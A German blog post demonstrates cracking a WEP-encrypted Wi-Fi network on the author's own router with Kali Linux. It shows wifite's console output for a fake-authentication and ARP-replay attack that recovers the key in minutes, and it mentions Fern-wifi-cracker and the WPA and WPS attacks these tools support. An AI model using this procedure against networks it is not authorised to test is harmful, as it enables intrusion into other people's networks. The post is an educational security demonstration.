WEP-128BIT vs. Kali Linux

Da ich immer mal wieder genervt werde wie einfach denn so ein WEP Verschlüsseltes Wlan geknackt werden kann gibt es hier einmal den Praxistest mit den Mitteln die uns Kali Linux zur Verfügung stellt. Bevor es losgeht brauchen wir zuerst natürlich einmal einen AccessPoint der noch WEP verschlüsselt. In meinem Fall ist das einer meiner 4 Linksys WRT54-GL Router die ich hier Zuhause einsetze um auch im letzten Winkel noch vernünftiges Wlan zu haben. Hier zumindest einmal die Wlanconfiguration für unseren Testaufbau.

Wlaneinstellungen meines Routers zu Testbeginn

Als Wlankarte wird meine AWUS036H USB Karte von Alfa Networks zum Einsatz kommen. Aktuell Trennen mich von dem Testrouter ca. 6 Meter Luftlinie 2 Wände und eine Betondecke, sollte allerdings dennoch in annehmbarer Zeit zu schaffen sein. Hier noch ein Bild von meiner kleinen Monsterkarte mit der ich übrigens mehr als zufrieden bin.

Alfa Network AWUS036H

 

Starten wir fürs erste mit „Wifite“ einem rundum Sorglos Packet wenn es um Wlans geht. Generell bevorzuge ich zwar immer noch den nativen Weg mit den Aircrack-ng Tools doch wifite ist ein ganz nützliches Frontend dafür und nimmt einem einige Tipp bzw. copy & paste arbeit ab. Wenn es also einmal schnell gehen soll ist wifite absolut die richtige Wahl.

root@brecht-lab:~# wifite

  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             

 [+] scanning for wireless devices...
 [+] available wireless devices:
  1. wlan0              Intel 4965AGN   iwl4965 - [phy0]
  2. wlan1              Realtek RTL8187L        rtl8187 - [phy1]
 [+] select number of device to put into monitor mode (1-2):

Wenn man wifite ohne Parameter startet fragt es direkt nach der Wlankarte die es benutzen soll. Nach einem Kurzen Scanvorgang sieht das ganze dann so aus:

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  ************          13  WPA   62db    no   client
    2  brechTESTnetz          9  WEP   43db    no 
    3  *****************     11  WPA2  43db    no 
    4  *****************      3  WPA2  38db    no 
    5  ********************   8  WPA2  35db   wps 
    6  ***************       11  WPA2  30db   wps 
    7  **************         4  WPA2  29db   wps 
    8  ********************   2  WPA2  28db   wps 
    9  ********************   3  WPA2  28db   wps 

 [+] select target numbers (1-9) separated by commas, or 'all':

Die Netze meiner Nachbarn hätte ich dann mal aus gestrichen, aber man sieht zumindest sehr schön das zumindest meine Nachbarschaft mittlerweile relativ gut erzogen ist wenn es um ihre Wlansicherheit geht 😉

Wählen wir jetzt also einmal 2 für brechtTESTnetz aus und schauen wie lange es denn dauert bis wir dieses Wlan geknackt haben.

 [+] 1 target selected.

 [0:10:00] preparing attack "brechTESTnetz" (00:25:9C:CF:89:14)
 [0:10:00] attempting fake authentication (1/5)...  success! 
 [0:10:00] attacking "brechTESTnetz" via arp-replay attack
 [0:08:18] started cracking (over 10000 ivs)        
 [0:06:42] captured 48450 ivs @ 742 iv/sec          

 [0:06:42] cracked brechTESTnetz (00:25:9C:CF:89:14)! key: "8B2906D191C894D05F10B439A5"

 [+] 1 attack completed:

 [+] 1/1 WEP attacks succeeded
        cracked brechTESTnetz (00:25:9C:CF:89:14), key: "8B2906D191C894D05F10B439A5"

 [+] disabling monitor mode on mon0... done
 [+] quitting

Knapp über 3 Minuten. Nicht schlecht für 128Bit WEP, vor allem wenn man an die beiden Mauern denkt die sich zwischen mir und dem AccessPoint befinden. So einfach kann das also gehen mit dem WEP Schlüssel.
Schauen wir uns doch noch ein anderes Tool an das in Kali Linux enthalten ist.

Für unser Mausschubser gibt es natürlich auch ein klickbares Tool, den Fern-wifi-cracker. Das Tool ist im wesentlichen selbsterklärend und funktioniert ähnlich wie Wifite relativ automatisch.

Fern-wifi-cracker nach getaner Arbeit

Zu meinen Lieblingstools wird der fern-wifi-cracker allerdings nie so wirklich zählen, da mir zum einen die Oberfläche an sich nicht zusagt und ich das Tool heute mehrfach durch kill -9 ins digitale Nirvana schießen musste bevor es dann einmal funktionierte.

Damit hätten wir dann schon 2 Wege gefunden um die alten Wlans mit WEP Verschlüsselung zu nutzen, falls wir einmal unser Passwort vergessen haben. Mit beiden Tools lassen sich auch Angriffe gegen WPA Verschlüsselte Wlans durchführen, ebenfalls unterstützen beide die WPS Schwachstelle mancher Access Points. Man ist also mit den beiden Tools in jedem Fall nicht schlecht beraten wenn es um Wlan geht.

Eine Erklärung von dem direkten Vorgehen mit den Aircrack-ng Tools spare ich mir jetzt an dieser Stelle mal. Aircrack-ng selbst ist so Umfangreich das es schon einen eigenen Post wert ist. Darauf gehe ich dann ein anderes mal ein, bis dahin viel Spaß mit den beiden Tools und lasst schön die Finger von den Wlans eurer Nachbarn.

Brechthold
Brechthold gehört zu dem Gründungsteam von Contempt-it . Nach ein paar Jahren der Abstinenz jetzt wieder zurück im Adminteam um ein wenig Ordnung zu schaffen. Zu seinen Lieblingsthemen gehören Honeypots, IDS-Systeme und Servermonitoring. Neben seiner Arbeit im Adminteam werkelt er noch an seinem Brechtblog

2 Kommentare

Schreib einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Durch die weitere Nutzung der Seite stimmst du der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn du diese Website ohne Änderung der Cookie-Einstellungen verwendest oder auf "Akzeptieren" klickst, erklärst du sich damit einverstanden.

Schließen